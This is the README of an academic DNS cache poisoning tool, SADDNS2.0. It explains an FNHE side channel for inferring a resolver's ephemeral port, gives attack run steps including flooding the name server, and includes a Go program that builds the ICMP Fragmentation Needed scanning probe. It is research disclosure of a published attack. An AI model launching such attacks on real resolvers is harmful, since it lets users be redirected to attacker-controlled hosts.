seclab-ucr/SADDNS2.0

SADDNS2.0: DNS Cache Poisoning Attack: Resurrections with Side Channels

Introduction

SADDNS2.0 is a tool for launching DNS cache poisoning attacks. It infers the resolver's ephemeral port number and then brute-forces the TxID, using the Forwarding Information Base (FIB) Next Hop Exception (FNHE) cache as a side channel.

It is a different side-channel cache poisoning attack derived from SADDNS; most of the usage is the same.

How it works

  1. Scan ephemeral ports opened by the resolver.
  2. Brute force TxID.

The side channel uses the hash table that stores FNHE entries as a resource shared between the spoofed and non-spoofed IPs. FNHE entries cache per-destination exceptions such as the path MTU, so they decide whether the resolver fragments the packets it sends to a destination. By observing the state of that table from a non-spoofed IP, an off-path attacker can tell whether its earlier spoofed ICMP Fragmentation Needed packets were accepted, which in turn reveals whether the guessed port was correct.

The following figure shows how the ephemeral port is inferred.

Off-path port scanning

Why is IP spoofing still necessary?

  • Compared with SADDNS, SADDNS2.0 scans for open ports with the UDP packet embedded in the ICMP message, so no IP spoofing is needed during the scanning phase.
  • IP spoofing is still required for injecting rogue responses.
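The probe that the scanning phase relies on is an ICMP Fragmentation Needed error (type 3, code 4) whose quoted IPv4/UDP header claims the resolver sent a DNS query from the guessed ephemeral port to the attacker's name server; a receiver only acts on such an error when the quoted 4-tuple matches one of its open sockets, which is what makes the port guess testable. The following Go program builds and parses that packet. It is an added illustration, not code from this repository or from the paper: it uses only the standard library (the tool itself relies on gopacket), sends nothing, and the addresses, port and MTU values are constructed assumptions. Observing the FNHE table afterwards is not modelled here.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
)

// Wire layout (RFC 792, RFC 1191), minimal headers only:
// outer IPv4 | ICMP type 3 code 4 | quoted IPv4 | first 8 bytes of quoted UDP.
const (
	icmpDestUnreach, icmpFragNeeded = 3, 4
	protoICMP, protoUDP             = 1, 17
	ipHdrLen, icmpHdrLen, udpHdrLen = 20, 8, 8
	probeLen                        = ipHdrLen + icmpHdrLen + ipHdrLen + udpHdrLen // 56 bytes
)

// Probe is one port-scanning message: an ICMP Fragmentation Needed error that
// quotes a DNS query the resolver supposedly sent from GuessedPort to NSIP.
type Probe struct {
	ICMPSrc     [4]byte // claimed sender of the ICMP error (a router on the path)
	ResolverIP  [4]byte // victim resolver: ICMP destination and source of the quoted UDP packet
	NSIP        [4]byte // attacker's name server: destination of the quoted UDP packet
	GuessedPort uint16  // candidate ephemeral source port in the quoted UDP header
	NextHopMTU  uint16  // path MTU the resolver is asked to cache for NSIP
}

// checksum is the ones'-complement sum of RFC 1071; over a buffer whose
// checksum field is already correct it returns 0.
func checksum(b []byte) uint16 {
	var sum uint32
	for i := 0; i+1 < len(b); i += 2 {
		sum += uint32(binary.BigEndian.Uint16(b[i:]))
	}
	if len(b)%2 == 1 {
		sum += uint32(b[len(b)-1]) << 8
	}
	for sum>>16 != 0 {
		sum = (sum & 0xffff) + (sum >> 16)
	}
	return ^uint16(sum)
}

// ipv4Header builds a 20-byte IPv4 header with DF set and a valid checksum.
func ipv4Header(src, dst [4]byte, proto byte, totalLen int) []byte {
	h := make([]byte, ipHdrLen)
	h[0], h[8], h[9] = 0x45, 64, proto // version/IHL, TTL, protocol
	binary.BigEndian.PutUint16(h[2:], uint16(totalLen))
	binary.BigEndian.PutUint16(h[6:], 0x4000) // flags: DF
	copy(h[12:], src[:])
	copy(h[16:], dst[:])
	binary.BigEndian.PutUint16(h[10:], checksum(h))
	return h
}

// Build serialises the probe as a complete IPv4 packet. Nothing is sent.
func (p Probe) Build() []byte {
	const quotedUDPLen = udpHdrLen + 512 // length the quoted datagram claims; arbitrary here
	udp := make([]byte, udpHdrLen)       // UDP checksum (bytes 6-7) left zero, legal over IPv4
	binary.BigEndian.PutUint16(udp[0:], p.GuessedPort)
	binary.BigEndian.PutUint16(udp[2:], 53)
	binary.BigEndian.PutUint16(udp[4:], quotedUDPLen)
	quoted := ipv4Header(p.ResolverIP, p.NSIP, protoUDP, ipHdrLen+quotedUDPLen)

	icmp := make([]byte, icmpHdrLen, icmpHdrLen+ipHdrLen+udpHdrLen)
	icmp[0], icmp[1] = icmpDestUnreach, icmpFragNeeded
	binary.BigEndian.PutUint16(icmp[6:], p.NextHopMTU) // bytes 4-5 unused, 6-7 next-hop MTU
	icmp = append(append(icmp, quoted...), udp...)
	binary.BigEndian.PutUint16(icmp[2:], checksum(icmp))

	outer := ipv4Header(p.ICMPSrc, p.ResolverIP, protoICMP, ipHdrLen+len(icmp))
	return append(outer, icmp...)
}

// Parse decodes a packet built by Build, verifying both checksums, and
// recovers the fields a receiving kernel would act on.
func Parse(pkt []byte) (Probe, error) {
	var p Probe
	if len(pkt) < probeLen || pkt[0] != 0x45 || pkt[9] != protoICMP {
		return p, errors.New("not an IPv4/ICMP packet of probe shape")
	}
	total := int(binary.BigEndian.Uint16(pkt[2:]))
	if total < probeLen || total > len(pkt) || checksum(pkt[:ipHdrLen]) != 0 {
		return p, errors.New("bad outer IPv4 length or checksum")
	}
	icmp := pkt[ipHdrLen:total]
	if checksum(icmp) != 0 || icmp[0] != icmpDestUnreach || icmp[1] != icmpFragNeeded {
		return p, errors.New("not a well-formed ICMP Fragmentation Needed message")
	}
	quoted := icmp[icmpHdrLen:]
	if quoted[0] != 0x45 || quoted[9] != protoUDP {
		return p, errors.New("quoted packet is not a plain IPv4/UDP header")
	}
	copy(p.ICMPSrc[:], pkt[12:16])
	copy(p.ResolverIP[:], quoted[12:16])
	copy(p.NSIP[:], quoted[16:20])
	p.GuessedPort = binary.BigEndian.Uint16(quoted[ipHdrLen:])
	p.NextHopMTU = binary.BigEndian.Uint16(icmp[6:])
	return p, nil
}

func main() {
	// Constructed example using RFC 5737 documentation addresses.
	p := Probe{ICMPSrc: [4]byte{198, 51, 100, 7}, ResolverIP: [4]byte{192, 0, 2, 53},
		NSIP: [4]byte{203, 0, 113, 10}, GuessedPort: 40123, NextHopMTU: 1280}
	pkt := p.Build()
	back, err := Parse(pkt)
	fmt.Printf("%d-byte probe: %x\nparsed: %+v err=%v\n", len(pkt), pkt, back, err)
}
```

To scan a port range, Build is called once per candidate port with the other fields fixed; in the real tool the quoted source port is the only thing that changes between probes, and the outer source address can be the attacker's own, which is why this phase needs no spoofing.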

Additional resources

Publication

DNS Cache Poisoning Attack: Resurrections with Side Channels

Keyu Man, Xin'an Zhou, Zhiyun Qian

In Proceedings of the ACM Conference on Computer and Communications Security (CCS '21), November 15-19, 2021, Virtual Event, Republic of Korea.

Website

SADDNS

How to run

Requirements

  • An IP-spoofing-capable host (preferably Linux; Windows works but performs poorly).
  • A domain with an attacker-controlled name server.
  • Other things to settle beforehand:
    • The resolver to poison (victim resolver).
    • The domain to poison (victim domain).
    • The victim domain's record is what gets poisoned on the victim resolver.

Overview

  • Determine the attack type (e.g., public or private port; Fragmentation Needed or Redirect packet as the payload).
  • Guess the seed/key of the FNHE hash table if private ports are used.
  • Flood query traffic to mute the name server of the victim domain (see the SADDNS repo for flooding scripts).
  • Run the attack program, which guesses the port number and TxID automatically.

Steps

  1. Compile

    go build ucr.edu/SADDNS2.0 (requires gopacket and libpcap)

  2. Seed guessing (only required when probing private ports)

    See the paper for details. GuessSeed.go provides methods to send out seed-guessing packets; guessSeed4.c implements the hash-guessing functions that recover the seed.

  3. Start flooding

    ./dns_query.sh & (requires hping3)

    Please see the comment in the file for usage.

  4. Start attacking (while flooding is still in progress)

    sudo ./saddns [args]

    Run ./saddns -h for usage.

Questions and issues

Please submit them by opening a new issue.
